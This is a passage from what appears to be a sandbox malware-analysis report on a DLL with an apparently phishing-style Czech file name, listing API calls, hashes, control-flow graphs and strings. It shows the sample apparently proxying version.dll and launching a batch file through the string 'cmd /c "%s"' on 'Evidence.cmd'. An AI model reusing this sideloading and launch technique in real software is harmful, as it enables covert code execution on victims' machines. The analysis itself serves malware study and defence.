6630->6632 6631->6629 6639 73d61000 6632->6639 6634 73d6102a __stdio_common_vswprintf 6634->6590 6638 73d61000 6635->6638 6637 73d6106a __stdio_common_vsprintf 6637->6628 6638->6637 6639->6634 6641 73d6180f ___scrt_release_startup_lock 6640->6641 6642 73d61813 _execute_onexit_table 6641->6642 6643 73d6181f __DllMainCRTStartup@12 6641->6643 6642->6610 6644 73d62071 _cexit 6643->6644 6645 73d6182c 6643->6645 6645->6610 6646->6604 6648 73d619ef __DllMainCRTStartup@12 6647->6648 6649 73d619fb memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6648->6649 6650 73d61ade __DllMainCRTStartup@12 6649->6650 6650->6613 6651->6583

                                                          Executed Functions

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 73D610A7
                                                            • Part of subcall function 73D61050: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000104,?,00000000,73D610CA,?,73D610CA,?,00000104,%s\version.dll,?), ref: 73D61073
                                                          • LoadLibraryA.KERNELBASE(?), ref: 73D610D4
                                                          • GetProcAddress.KERNEL32(00000000,73D630CC), ref: 73D610EE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697594811.0000000073D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 73D60000, based on PE: true
                                                          • Associated: 00000012.00000002.1697568301.0000000073D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697616754.0000000073D63000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697658027.0000000073D65000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_73d60000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryLibraryLoadProcSystem__stdio_common_vsprintf
                                                          • String ID: %s\version.dll
                                                          • API String ID: 3198012587-940674477
                                                          • Opcode ID: 5de5300d80e8fba68bd9b23fb231d9648fc45f4745cd586e5daa89f8a850f33a
                                                          • Instruction ID: 3a0be65e3f6a19e603d546f3b5d02531e4f4b844aaf7fb6f1e051c6e2a00cead
                                                          • Opcode Fuzzy Hash: 5de5300d80e8fba68bd9b23fb231d9648fc45f4745cd586e5daa89f8a850f33a
                                                          • Instruction Fuzzy Hash: 59F0A473800618EBDB20EAA5CC49BD5B7BCEB14394F0104A5EAB8A7111D7F569988FB1

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 73D61090: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 73D610A7
                                                            • Part of subcall function 73D61090: LoadLibraryA.KERNELBASE(?), ref: 73D610D4
                                                            • Part of subcall function 73D61090: GetProcAddress.KERNEL32(00000000,73D630CC), ref: 73D610EE
                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 73D61178
                                                            • Part of subcall function 73D61010: __stdio_common_vswprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,00000104,?,00000000,73D6119A,?,73D6119A,?,00000104,%s\,?), ref: 73D6102F
                                                          • GetFileAttributesW.KERNELBASE(?), ref: 73D611FB
                                                          • MoveFileW.KERNEL32(?,?), ref: 73D6121A
                                                          • memset.VCRUNTIME140(?,00000000), ref: 73D6125F
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 73D61295
                                                          • CloseHandle.KERNEL32 ref: 73D612A2
                                                          • CloseHandle.KERNEL32(?), ref: 73D612AC
                                                          • ExitProcess.KERNEL32 ref: 73D612B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697594811.0000000073D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 73D60000, based on PE: true
                                                          • Associated: 00000012.00000002.1697568301.0000000073D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697616754.0000000073D63000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697658027.0000000073D65000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_73d60000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: CloseDirectoryFileHandleProcess$AddressAttributesCreateCurrentExitLibraryLoadMoveProcSystem__stdio_common_vswprintfmemset
                                                          • String ID: %s\$%s\Evidence.$%s\Evidence.cmd$D$cmd /c "%s"
                                                          • API String ID: 967844197-1087385400
                                                          • Opcode ID: dd58c816e5b6ca866a15a759647900f6d91d172b106c8887c624dc8be4ecc86f
                                                          • Instruction ID: a86f446b202944d6b80cc9cc9bd50c1233ec9b23b3344e9a42bc3e1d030d80cc
                                                          • Opcode Fuzzy Hash: dd58c816e5b6ca866a15a759647900f6d91d172b106c8887c624dc8be4ecc86f
                                                          • Instruction Fuzzy Hash: F431A4B2508744EBE320EAB1CC45F9A73ECAB44784F400D19FAE9D5094F776D2688B36

                                                          Control-flow Graph

                                                          APIs
                                                          • __RTC_Initialize.LIBCMT ref: 73D61466
                                                          • ___scrt_uninitialize_crt.LIBCMT ref: 73D61480
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697594811.0000000073D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 73D60000, based on PE: true
                                                          • Associated: 00000012.00000002.1697568301.0000000073D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697616754.0000000073D63000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697658027.0000000073D65000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_73d60000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Initialize___scrt_uninitialize_crt
                                                          • String ID:
                                                          • API String ID: 2442719207-0
                                                          • Opcode ID: bc7c304da7694419fcdb4a63ae3a9d9a8ab225d1429bd1316766819550ac5f57
                                                          • Instruction ID: 5f1934e1efc0ecb4d0a5cccffb0d7c45aee28f0d4c52f466db95b99428b45c74
                                                          • Opcode Fuzzy Hash: bc7c304da7694419fcdb4a63ae3a9d9a8ab225d1429bd1316766819550ac5f57
                                                          • Instruction Fuzzy Hash: 6F41C472D04725EFEB119F65C850B9EBAB9EB40AE1F104119E83AB7390D7389D058BB0

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697594811.0000000073D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 73D60000, based on PE: true
                                                          • Associated: 00000012.00000002.1697568301.0000000073D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697616754.0000000073D63000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697658027.0000000073D65000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_73d60000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                                          • String ID:
                                                          • API String ID: 3136044242-0
                                                          • Opcode ID: d4ae0ae19f6fa076ade7412cd849bcc27b8e34c4d65689024d2f85254d5035d7
                                                          • Instruction ID: f0a63bb88ae7dabf28e644a1c66b09b7219aedac33dcc8a3ff74bfed07aa4fb8
                                                          • Opcode Fuzzy Hash: d4ae0ae19f6fa076ade7412cd849bcc27b8e34c4d65689024d2f85254d5035d7
                                                          • Instruction Fuzzy Hash: 53216572D00225EFDB128F55CC90B6FBAB9EB84AE0B054119F83777350D7358D418BA0

                                                          Non-executed Functions

                                                          APIs
                                                          • DName::DName.LIBVCRUNTIME ref: 6FDF5825
                                                          • operator+.LIBVCRUNTIME ref: 6FDF583F
                                                          • DName::operator+.LIBCMT ref: 6FDF596D
                                                          • DName::operator+.LIBCMT ref: 6FDF598A
                                                            • Part of subcall function 6FDF6AC1: DName::DName.LIBVCRUNTIME ref: 6FDF6B04
                                                          • DName::operator+.LIBCMT ref: 6FDF5A3E
                                                          • DName::operator+.LIBCMT ref: 6FDF5A4D
                                                            • Part of subcall function 6FDFB021: DName::operator+.LIBCMT ref: 6FDFB065
                                                            • Part of subcall function 6FDFB021: DName::operator+.LIBCMT ref: 6FDFB071
                                                            • Part of subcall function 6FDFB021: DName::operator+.LIBCMT ref: 6FDFB0EC
                                                            • Part of subcall function 6FDFB021: DName::operator+=.LIBCMT ref: 6FDFB12F
                                                          • DName::operator+.LIBCMT ref: 6FDF59D9
                                                            • Part of subcall function 6FDF5630: DName::operator=.LIBVCRUNTIME ref: 6FDF5651
                                                            • Part of subcall function 6FDF55D8: shared_ptr.LIBCMT ref: 6FDF55F4
                                                            • Part of subcall function 6FDF70CC: shared_ptr.LIBCMT ref: 6FDF7172
                                                          • DName::operator+.LIBCMT ref: 6FDF5FB7
                                                          • DName::operator+.LIBCMT ref: 6FDF5FD3
                                                          • DName::operator+.LIBCMT ref: 6FDF6272
                                                            • Part of subcall function 6FDF5503: DName::operator+.LIBCMT ref: 6FDF5524
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Name::operator+$NameName::shared_ptr$Name::operator+=Name::operator=operator+
                                                          • String ID: /$[thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                                          • API String ID: 848932493-2884338863
                                                          • Opcode ID: d0980f3199cce55c1fdeee494672e48c3981323fb7c5ad9e2b2c4c6eafa2452a
                                                          • Instruction ID: 26bcab9f34c10bac461b1ca5643c7501be57111f8a482276603a8ee8a49f13d8
                                                          • Opcode Fuzzy Hash: d0980f3199cce55c1fdeee494672e48c3981323fb7c5ad9e2b2c4c6eafa2452a
                                                          • Instruction Fuzzy Hash: 03926276E566199BEB44CFA8CC91FEE77B4AF05314F05423AE512EB2C0DB28F5068B50
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 73D619E5
                                                          • memset.VCRUNTIME140(?,00000000,00000003), ref: 73D61A0B
                                                          • memset.VCRUNTIME140(?,00000000,00000050), ref: 73D61A95
                                                          • IsDebuggerPresent.KERNEL32 ref: 73D61AB1
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 73D61ACA
                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 73D61AD4
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697594811.0000000073D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 73D60000, based on PE: true
                                                          • Associated: 00000012.00000002.1697568301.0000000073D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697616754.0000000073D63000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697658027.0000000073D65000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_73d60000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                          • String ID:
                                                          • API String ID: 1045392073-0
                                                          • Opcode ID: 8f6533e49a887be98e69c614662f2c2ff5011cb4d32627b75ff325dd33714196
                                                          • Instruction ID: 5a695ab30b6b2465f52619bd2d750e79f97040b4d46781af4ab63049dbea5cd8
                                                          • Opcode Fuzzy Hash: 8f6533e49a887be98e69c614662f2c2ff5011cb4d32627b75ff325dd33714196
                                                          • Instruction Fuzzy Hash: A53147B5D01318DBDB20DFA1C9487CDBBB8BF08340F1041AAE40DAB250EB719A85CF55
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6FDFF301
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor
                                                          • String ID:
                                                          • API String ID: 2325560087-0
                                                          • Opcode ID: d33d975020a6f4a4c096ce11d156ce68d8c3e65d65468195657476235b448beb
                                                          • Instruction ID: f999fa9beca5ab5b4a74f0d0f3eff1515a5093def58d9e1015fc4278dbdcdc02
                                                          • Opcode Fuzzy Hash: d33d975020a6f4a4c096ce11d156ce68d8c3e65d65468195657476235b448beb
                                                          • Instruction Fuzzy Hash: F8A16AB2D01B05CBDB04CF94C481B99BBF6FB5A728F25822EE455EF240D339A461CB59
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 73D61BDD
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697594811.0000000073D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 73D60000, based on PE: true
                                                          • Associated: 00000012.00000002.1697568301.0000000073D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697616754.0000000073D63000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697658027.0000000073D65000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_73d60000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor
                                                          • String ID:
                                                          • API String ID: 2325560087-0
                                                          • Opcode ID: ad78e005a02b9a6300eb55d04156b6c8ce07049088e22a177e630f9e3d8af519
                                                          • Instruction ID: 16fc61e466c318e5ab2e06efacb311e24765dafa3ea53c81f673f918d79c44fe
                                                          • Opcode Fuzzy Hash: ad78e005a02b9a6300eb55d04156b6c8ce07049088e22a177e630f9e3d8af519
                                                          • Instruction Fuzzy Hash: 3EA1BDB3904A24CFCB04DFA6C58579DBBF5FB487A0F28812AD42AEB280D3349454CF64
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction ID: fbe11e0d38f77faa2a9166aab1c14fd81aed84a444bf21911cb2bd84c934c964
                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction Fuzzy Hash: 0411E97B247291C3D6C28B3DD4B0EF6A795EAC522576B8377D0514B754F123F2479600

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 507 6fdf6b70-6fdf6b82 508 6fdf704f-6fdf705c call 6fdf552e 507->508 509 6fdf6b88-6fdf6ba8 507->509 521 6fdf705f 508->521 510 6fdf6bae 509->510 511 6fdf6c83-6fdf6c86 509->511 513 6fdf6bb4-6fdf6bba 510->513 514 6fdf6c73-6fdf6c81 510->514 516 6fdf6cee-6fdf6cfc call 6fdfb38f 511->516 517 6fdf6c88-6fdf6ca7 call 6fdf7d06 511->517 513->517 518 6fdf6bc0-6fdf6bc7 513->518 520 6fdf6c24-6fdf6c30 call 6fdf5452 514->520 540 6fdf6def-6fdf6df5 516->540 541 6fdf6d02 516->541 543 6fdf6fad-6fdf6fb5 517->543 544 6fdf6cad-6fdf6cb0 517->544 518->517 524 6fdf6c4f-6fdf6c69 call 6fdf55d8 518->524 525 6fdf6bce 518->525 526 6fdf6bed-6fdf6bfb 518->526 527 6fdf6bfd-6fdf6c0b 518->527 528 6fdf6c0d-6fdf6c14 518->528 529 6fdf6c6b-6fdf6c6e 518->529 530 6fdf6c16-6fdf6c1d 518->530 531 6fdf6c35-6fdf6c4a call 6fdf5452 518->531 545 6fdf7022-6fdf7025 520->545 533 6fdf7062-6fdf7066 521->533 524->544 538 6fdf6bd5 525->538 542 6fdf6bdc-6fdf6be8 call 6fdf5452 526->542 527->542 528->538 539 6fdf6e05-6fdf6e1d 529->539 530->520 531->524 538->542 549 6fdf6e1f-6fdf6e43 call 6fdf964c 539->549 550 6fdf6e6a-6fdf6e6c 539->550 547 6fdf6dfb 540->547 548 6fdf6fba 540->548 552 6fdf6ddc-6fdf6dea 541->552 553 6fdf6d08-6fdf6d0b 541->553 542->544 543->533 554 6fdf6cd8-6fdf6ce9 544->554 555 6fdf6cb2-6fdf6cb4 544->555 556 6fdf703f-6fdf704d 545->556 557 6fdf7027-6fdf703a call 6fdf5503 call 6fdf5630 545->557 563 6fdf6f8e-6fdf6fab call 6fdf7d06 547->563 564 6fdf6f2d-6fdf6f34 547->564 565 6fdf6efd-6fdf6f04 547->565 566 6fdf6eea-6fdf6ef8 547->566 567 6fdf6f09-6fdf6f10 547->567 568 6fdf6f39-6fdf6f47 547->568 569 6fdf6f49-6fdf6f8c call 6fdf9291 call 6fdf51dc call 6fdf5572 547->569 570 6fdf6f15-6fdf6f1c 547->570 571 6fdf6e02-6fdf6e04 547->571 572 6fdf6f21-6fdf6f28 547->572 558 6fdf6fc1 548->558 603 6fdf6e45-6fdf6e5f call 6fdf55d8 549->603 604 6fdf6e62-6fdf6e65 549->604 559 6fdf6e6e-6fdf6e76 550->559 560 6fdf6ed0-6fdf6ee5 call 6fdf964c 550->560 561 6fdf6fc8-6fdf6fcf call 6fdf5452 552->561 575 6fdf6d94-6fdf6d97 553->575 576 6fdf6d11 553->576 562 6fdf6ffe-6fdf701f call 6fdf51dc call 6fdf5572 554->562 577 6fdf6cb6-6fdf6cb8 555->577 578 6fdf6cd0-6fdf6cd3 555->578 556->533 557->556 558->561 579 6fdf6e78-6fdf6e94 call 6fdf5452 559->579 580 6fdf6eb2-6fdf6eb4 559->580 560->521 594 6fdf6fd4-6fdf6fdb 561->594 562->545 563->543 563->594 565->558 566->561 568->561 569->594 571->539 572->558 584 6fdf6d99-6fdf6d9c 575->584 585 6fdf6dd0-6fdf6dd7 575->585 576->585 591 6fdf6d17-6fdf6d1a 576->591 577->578 586 6fdf6cba-6fdf6cbc 577->586 588 6fdf6ff0-6fdf6ff7 578->588 579->560 621 6fdf6e96-6fdf6eb0 call 6fdf55d8 579->621 580->560 595 6fdf6eb6-6fdf6ecb call 6fdf5452 580->595 598 6fdf6d9e-6fdf6da1 584->598 599 6fdf6dc4-6fdf6dcb 584->599 585->558 586->578 600 6fdf6cbe-6fdf6cc0 586->600 588->562 605 6fdf6d1c-6fdf6d1f 591->605 606 6fdf6d85-6fdf6d8f call 6fdf5473 591->606 609 6fdf6fed 594->609 610 6fdf6fdd-6fdf6fdf 594->610 595->560 598->599 614 6fdf6da3-6fdf6da6 598->614 599->558 600->578 615 6fdf6cc2-6fdf6cc5 600->615 603->604 604->543 619 6fdf6d58-6fdf6d80 call 6fdf6b70 call 6fdf54e1 605->619 620 6fdf6d21-6fdf6d24 605->620 606->594 609->588 610->609 623 6fdf6fe1-6fdf6fe3 610->623 626 6fdf6da8-6fdf6dab 614->626 627 6fdf6db1-6fdf6dbf 614->627 615->594 628 6fdf6ccb 615->628 619->521 631 6fdf6d26-6fdf6d29 620->631 632 6fdf6d45-6fdf6d53 620->632 621->560 623->609 636 6fdf6fe5-6fdf6fe7 623->636 626->548 626->627 627->561 628->545 631->632 633 6fdf6d2b-6fdf6d2e 631->633 632->561 638 6fdf6d39-6fdf6d40 633->638 639 6fdf6d30-6fdf6d33 633->639 636->609 642 6fdf6fe9-6fdf6feb 636->642 638->558 639->548 639->638 642->545 642->609
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: shared_ptr$operator+$Name::operator+Name::operator=
                                                          • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                          • API String ID: 1464150960-1482988683
                                                          • Opcode ID: 102cfd2fa03c6bb1fd4dc1dd1325b04c708fd1b7de8f503338d0478b823f623f
                                                          • Instruction ID: e33955cee1d06151cc4c3a6b4120e1dbfc01e6afe2d37eb2f1d2347aacfb0676
                                                          • Opcode Fuzzy Hash: 102cfd2fa03c6bb1fd4dc1dd1325b04c708fd1b7de8f503338d0478b823f623f
                                                          • Instruction Fuzzy Hash: 7CE15EB6C0620ADACB84CFA8C555FEEBBB8EF46304F12821AD511A7680D7357647CF91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1156 6fdfa3ca-6fdfa3f0 call 6fdfb38f 1159 6fdfa3f6 1156->1159 1160 6fdfa520-6fdfa526 1156->1160 1163 6fdfa3fc-6fdfa3ff 1159->1163 1164 6fdfa53a-6fdfa551 call 6fdf655d 1159->1164 1161 6fdfa52c-6fdfa533 1160->1161 1162 6fdfa749 1160->1162 1161->1162 1161->1164 1168 6fdfa5fc-6fdfa634 call 6fdf9d58 call 6fdf9dd6 atol 1161->1168 1169 6fdfa6fb-6fdfa709 call 6fdfa796 1161->1169 1170 6fdfa729-6fdfa744 call 6fdf7bae 1161->1170 1171 6fdfa716-6fdfa724 1161->1171 1172 6fdfa5f0-6fdfa5f7 1161->1172 1167 6fdfa74b-6fdfa74d call 6fdf524a 1162->1167 1165 6fdfa405 1163->1165 1166 6fdfa4c4-6fdfa4c7 1163->1166 1193 6fdfa55d-6fdfa575 call 6fdf795a call 6fdf5630 call 6fdf5687 1164->1193 1194 6fdfa553-6fdfa556 1164->1194 1174 6fdfa40b-6fdfa40f 1165->1174 1175 6fdfa4b9-6fdfa4bf call 6fdf8773 1165->1175 1176 6fdfa4c9-6fdfa4cc 1166->1176 1177 6fdfa515-6fdfa51b call 6fdfad53 1166->1177 1182 6fdfa752-6fdfa762 call 6fdff260 1167->1182 1224 6fdfa669-6fdfa69c call 6fdfb717 call 6fdf4f06 1168->1224 1225 6fdfa636-6fdfa63e 1168->1225 1169->1162 1206 6fdfa70b-6fdfa711 call 6fdfa3ca 1169->1206 1172->1182 1186 6fdfa415-6fdfa418 1174->1186 1187 6fdfa4b2-6fdfa4b4 1174->1187 1209 6fdfa43d-6fdfa43e 1175->1209 1188 6fdfa4ce-6fdfa4d1 1176->1188 1189 6fdfa50a-6fdfa510 call 6fdf91d5 1176->1189 1177->1209 1199 6fdfa41e-6fdfa421 1186->1199 1200 6fdfa4aa-6fdfa4b0 call 6fdf9d58 1186->1200 1187->1167 1201 6fdfa4fd-6fdfa505 call 6fdf822c 1188->1201 1202 6fdfa4d3-6fdfa4d6 1188->1202 1189->1209 1216 6fdfa57a-6fdfa57d 1193->1216 1194->1193 1205 6fdfa558-6fdfa55b 1194->1205 1212 6fdfa453-6fdfa45b 1199->1212 1213 6fdfa423-6fdfa426 1199->1213 1200->1209 1201->1209 1202->1201 1214 6fdfa4d8-6fdfa4db 1202->1214 1205->1193 1205->1216 1209->1182 1222 6fdfa45d-6fdfa47c call 6fdf51dc 1212->1222 1223 6fdfa481-6fdfa4a5 call 6fdf655d call 6fdf795a call 6fdf5572 1212->1223 1226 6fdfa44b-6fdfa451 call 6fdfae94 1213->1226 1227 6fdfa428-6fdfa42c 1213->1227 1230 6fdfa4dd-6fdfa4e1 1214->1230 1231 6fdfa4f2-6fdfa4f8 call 6fdf6812 1214->1231 1228 6fdfa57f-6fdfa582 1216->1228 1229 6fdfa5b0-6fdfa5c8 call 6fdf9d58 call 6fdf5630 call 6fdf5687 1216->1229 1222->1182 1223->1182 1278 6fdfa69e-6fdfa6a2 1224->1278 1279 6fdfa6f2-6fdfa6f9 1224->1279 1225->1224 1234 6fdfa640-6fdfa653 __telemetry_main_return_trigger 1225->1234 1226->1209 1235 6fdfa42e-6fdfa431 1227->1235 1236 6fdfa443-6fdfa449 call 6fdf9fea 1227->1236 1237 6fdfa584-6fdfa587 1228->1237 1238 6fdfa593-6fdfa5ab call 6fdf9d58 call 6fdf5630 call 6fdf5687 1228->1238 1248 6fdfa5cd-6fdfa5db call 6fdf9d58 call 6fdf5630 1229->1248 1230->1162 1239 6fdfa4e7-6fdfa4ed call 6fdf795a 1230->1239 1231->1209 1234->1224 1269 6fdfa655-6fdfa664 call 6fdf4f06 1234->1269 1235->1162 1247 6fdfa437-6fdfa438 call 6fdf6595 1235->1247 1236->1209 1237->1248 1249 6fdfa589-6fdfa58c 1237->1249 1238->1229 1239->1209 1247->1209 1270 6fdfa5e0 1248->1270 1249->1229 1261 6fdfa58e-6fdfa591 1249->1261 1261->1238 1261->1270 1269->1182 1283 6fdfa5e2-6fdfa5eb call 6fdf5594 1270->1283 1278->1279 1286 6fdfa6a4-6fdfa6a7 1278->1286 1288 6fdfa6e9-6fdfa6f0 1279->1288 1283->1182 1290 6fdfa6a9-6fdfa6ac 1286->1290 1291 6fdfa6e2 1286->1291 1292 6fdfa6c0-6fdfa6dd call 6fdf51dc call 6fdf5572 1288->1292 1290->1162 1294 6fdfa6b2-6fdfa6b9 1290->1294 1291->1288 1292->1283 1294->1292
                                                          APIs
                                                          • DName::operator+.LIBCMT ref: 6FDFA4A0
                                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6FDFA4AB
                                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6FDFA597
                                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6FDFA5B4
                                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6FDFA5D1
                                                          • DName::operator+.LIBCMT ref: 6FDFA5E6
                                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6FDFA600
                                                          • atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000010,00000002,00000000,0000002C,00000000,0000007B,00000000,?,00000000), ref: 6FDFA621
                                                          • __telemetry_main_return_trigger.VCRUNTIME140(00000000), ref: 6FDFA648
                                                          • swprintf.LIBCMT ref: 6FDFA67B
                                                          • DName::operator+.LIBCMT ref: 6FDFA6D6
                                                            • Part of subcall function 6FDF6595: DName::DName.LIBVCRUNTIME ref: 6FDF65F3
                                                          • DName::DName.LIBVCRUNTIME ref: 6FDFA74D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$__telemetry_main_return_triggeratolswprintf
